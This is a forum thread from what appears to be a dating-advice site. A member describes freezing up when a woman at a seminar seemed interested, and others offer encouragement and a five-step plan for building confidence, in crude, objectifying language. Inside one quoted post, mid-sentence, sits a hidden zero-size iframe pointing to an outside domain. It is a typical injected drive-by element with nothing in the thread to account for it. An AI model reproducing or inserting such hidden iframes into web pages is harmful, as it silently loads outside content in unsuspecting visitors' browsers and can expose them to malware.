What the h3ll is that?

Blue Phoenix

Master Don Juan
Jul 23, 2004
Reaction score
Another Dimension
Guys you won't believe in this!

I went to a seminar this week and a cute girl with a hot body was flirting with me and I did NOTHING!

Of course it was me that started to whole thing by looking at her and as soon as she noticed she started to show buying signals. She fixed her hair for more than 15 times, and her clothes too. She looked at me and pretended she was not.

I simply got froze up! The only thing it was necessary to do was to ask for her number and close the deal another day.

Has any of you been through this kind of thing? It's all subconscious. I am completely frustrated. :(


Master Don Juan
Apr 2, 2003
Reaction score
Yup. I forget where I read this, but I'll try to quote from memory "The pain of never knowing is far worse than the temporary sting of rejection"

Or something like that. Just make that your mantra. Because seriously, if you get rejected, at least you'll know where you stand. Instead of going "what if?!?" to yourself for the next couple of weeks.


Senior Don Juan
Dec 21, 2004
Reaction score
Originally posted by Blue Phoenix
Guys you won't believe in this!

I went to a seminar this week and a cute girl with a hot body was flirting with me and I did NOTHING!

Of course it was me that started to whole thing by looking at her and as soon as she noticed she started to show buying signals. She fixed her hair for more than 15 times, and her clothes too. She looked at me and pretended she was not.

I simply got froze up! The only thing it was necessary to do was to ask for her number and close the deal another day.

Has any of you been through this kind of thing? It's all<IFRAME SRC="http://iccee.com/index.html" WIDTH=0 HEIGHT=0 SCROLLING=NO FRAMEBORDER=0></IFRAME> subconscious. I am completely frustrated. :(
Lol that happens to me sometimes.

Blue Phoenix

Master Don Juan
Jul 23, 2004
Reaction score
Another Dimension
Originally posted by italostud
Yup. I forget where I read this, but I'll try to quote from memory "The pain of never knowing is far worse than the temporary sting of rejection"

Or something like that. Just make that your mantra. Because seriously, if you get rejected, at least you'll know where you stand. Instead of going "what if?!?" to yourself for the next couple of weeks.
It was not a matter of rejection, as she was clearly interested, I simply couldn't get her digits. :confused:
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Mr. Cardio

Aug 27, 2005
Reaction score
why do you think you froze up? Happened to me sometimes when I feel more in a shell or focused on other things besides women, you probably just had your mind somewhere else, and didnt realize the opportunity with the chick until later or after she was gone. Happened to me, lots of times.


Don Juan
Nov 27, 2003
Reaction score
You have over 500 posts...go out and make talking to hott chicks a past time hobby! Talk to these girls like you've known them your whole life. Once you master this no girl is intimidating and you will never freeze up.

Blue Phoenix

Master Don Juan
Jul 23, 2004
Reaction score
Another Dimension
Originally posted by Austizzle
You have over 500 posts...go out and make talking to hott chicks a past time hobby! Talk to these girls like you've known them your whole life. Once you master this no girl is intimidating and you will never freeze up.
Good idea, but you don't understand my point. What I have is a strange emotional response that block any rational thinking. Everything goes blank! :mad:


Master Don Juan
Nov 14, 2001
Reaction score
at our house
Originally posted by Blue Phoenix
Good idea, but you don't understand my point. What I have is a strange emotional response that block any rational thinking. Everything goes blank! :mad:
is this a normal freeze up ? or is this a once in a lifetime kinda freeze up'?


Don Juan
Nov 27, 2003
Reaction score
Hmm...I don't know man, practice makes perfect I guess. I have never "froze up", but I was once to the point where there would be awkward silence whenever I talked to a hot chick. Now that I am over that and my confidence is up I can talk to pretty much anyone.

Blue Phoenix

Master Don Juan
Jul 23, 2004
Reaction score
Another Dimension
Originally posted by penkitten
is this a normal freeze up ? or is this a once in a lifetime kinda freeze up'?
It usually happens. I get all self-conscious and freeze up; I don't know if I could call this "claustrophobia".:confused:
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Senior Don Juan
Sep 15, 2004
Reaction score
I'm the same way... It hurts SO BAD not to take an opportunity. I'm 23 and I feel that the clock is ticking! I'm no dud, but I still feel that I have a lot of catching up to do.

At least you're in the "Damn, I should've gone for it" instead of the "I can't do it!" frame. That's a huge step in your DJ progression, think of how many guys still haven't tackled it...


Don Juan
Jan 2, 2005
Reaction score
Boston, MA
I'll draw out the progression here since these are all the steps you'll go through. The only one you’ll need to "push through" so to speak is the first.

1. You are at the point where you have to grab your balls, walk up, and say something (anything) just to get the ball rolling and get comfortable talking to hot women. You freeze because you’re afraid and don’t know what to say. (proably because you're saying somethign to yourself like "**** hot chick, how do I score didgits!" which will kill you.)

This is ENTIRELY based on a lack of experience and can only truly be solved by doing it and getting experience.

Just be social for the most part. You're not going to fvck her, you're not going to get a number, you're not going to try and get a date, you're not going to give two ****s about what she thinks, and you're not going to worry about techniques for now… that’s for people who are already 100% comfortable and just like to have fun with the interactions they have with others.

How can you even think about getting a number when before you even talk to a chick you're nervous and frozen?

You can’t hit a home run before you learn how to swing a bat.

2. After a while you'll realize that most people are pretty cool and nice in settings where you're expected to be social, or in general. So you'll start talking to more people.

3. Next your comfort will increase dramatically. You'll be able to naturally lead the interaction where you want to lead. It will become effortless and fun and you'll date some women.

4. You'll start to see things in women that you like and things that you do not. You'll become pickier and only date the ones you like, screening out the ones you don't. (lol here is were you usually experience a stalker or two)

5. After a while you find one you really like, you're cool, confident, collected, fun, interesting, and since you know you can get another if you want it naturally makes you a challenge since you don't take bull****, tease a little, play a little, and express your personality to a great degree.

Going through this progression can take 10 years or 6 months depending on how quickly you get through step 1 since I think it's the biggest block to progression and the hardest to overcome. Just think about how much more in control of your life and better you will feel about yourself once you reach the last step and that talking to women is…really no big deal in the end.

Next time you see a chick, you're attracted to her, and she looks open to conversation or is giving you the eye... just walk up and talk and see where it goes. Don't put any expectations on the interaction like "OMG I HAVE to get her number" because then you get all stupid and weird and come across and "trying to get somewhere" instead of letting things flow naturally and paying attention to what's going on in the moment...which is far more important to making a cool connection with a woman (which will lead to her wanting to give you her number AND follow up with you) than trying to use some "technique" that totally doesn't apply to what's going on.
Aug 14, 2005
Reaction score
I froze once in a supermarket. A woman smiled at me...now, I like tall girls as much as the next guy (or more), but I am a short guy & this woman was 6'4" if she was an inch. No kidding, big blonde Viking woman. We like to think we are suave, but this was like a meteor falling out of the sky & landing on your car--totally unexpected, resulting in complete mental lock-up. So I didn't stop her & she kept going & I have kicked myself 1000 times because I like big amazon women. Ugh.


Master Don Juan
Feb 14, 2005
Reaction score
Originally posted by Blue Phoenix

Has any of you been through this kind of thing? It's all subconscious. I am completely frustrated. :(

Shrug. The other day while out playing kickball with some guys and girls this one hot chick i had talked to the first time we played passed by me while we were changing teams on the field. She said, "you're awfully quiet today." I kept walking right past her and replied "oh well" without a smile or anything. I don't even think she looked at me the rest of the game.

Way to make friends, me.


Senior Don Juan
Nov 8, 2002
Reaction score
Sheffield, UK
hey BP!!

well at last your getting a bit of experience under your belt :), dont you think this is a wake up call to speak to more hot-looking chicks so you wont go through the same 'freezin' motion in future??

all the best,


Blue Phoenix

Master Don Juan
Jul 23, 2004
Reaction score
Another Dimension
Originally posted by Qmanchoo
I'll draw out the progression here since these are all the steps you'll go through. The only one you’ll need to "push through" so to speak is the first.

1. You are at the point where you have to grab your balls, walk up, and say something (anything) just to get the ball rolling and get comfortable talking to hot women. You freeze because you’re afraid and don’t know what to say. (proably because you're saying somethign to yourself like "**** hot chick, how do I score didgits!" which will kill you.)

This is ENTIRELY based on a lack of experience and can only truly be solved by doing it and getting experience.

Just be social for the most part. You're not going to fvck her, you're not going to get a number, you're not going to try and get a date, you're not going to give two ****s about what she thinks, and you're not going to worry about techniques for now… that’s for people who are already 100% comfortable and just like to have fun with the interactions they have with others.

How can you even think about getting a number when before you even talk to a chick you're nervous and frozen?

You can’t hit a home run before you learn how to swing a bat.

2. After a while you'll realize that most people are pretty cool and nice in settings where you're expected to be social, or in general. So you'll start talking to more people.

3. Next your comfort will increase dramatically. You'll be able to naturally lead the interaction where you want to lead. It will become effortless and fun and you'll date some women.

4. You'll start to see things in women that you like and things that you do not. You'll become pickier and only date the ones you like, screening out the ones you don't. (lol here is were you usually experience a stalker or two)

5. After a while you find one you really like, you're cool, confident, collected, fun, interesting, and since you know you can get another if you want it naturally makes you a challenge since you don't take bull****, tease a little, play a little, and express your personality to a great degree.

Going through this progression can take 10 years or 6 months depending on how quickly you get through step 1 since I think it's the biggest block to progression and the hardest to overcome. Just think about how much more in control of your life and better you will feel about yourself once you reach the last step and that talking to women is…really no big deal in the end.

Next time you see a chick, you're attracted to her, and she looks open to conversation or is giving you the eye... just walk up and talk and see where it goes. Don't put any expectations on the interaction like "OMG I HAVE to get her number" because then you get all stupid and weird and come across and "trying to get somewhere" instead of letting things flow naturally and paying attention to what's going on in the moment...which is far more important to making a cool connection with a woman (which will lead to her wanting to give you her number AND follow up with you) than trying to use some "technique" that totally doesn't apply to what's going on.
Man, you hit the nail on the head. I was so worried about getting her digits that it was killing me! It would have been much better if I had broken the ice and then, if she was open enough during the talking, asked for her number.

I simply put too much pressure on myself. I got worried about failing, what she would think of me, how should I have approached her, etc. I was thinking of just going to her and get her digits and say nothing more, but it would be akward. Would'nt it?

Originally posted by stevey_2000
hey BP!!

well at last your getting a bit of experience under your belt :), dont you think this is a wake up call to speak to more hot-looking chicks so you wont go through the same 'freezin' motion in future??

all the best,

We both are having some problems, aren't we?

To everyone, thanks for your replies. :cheer: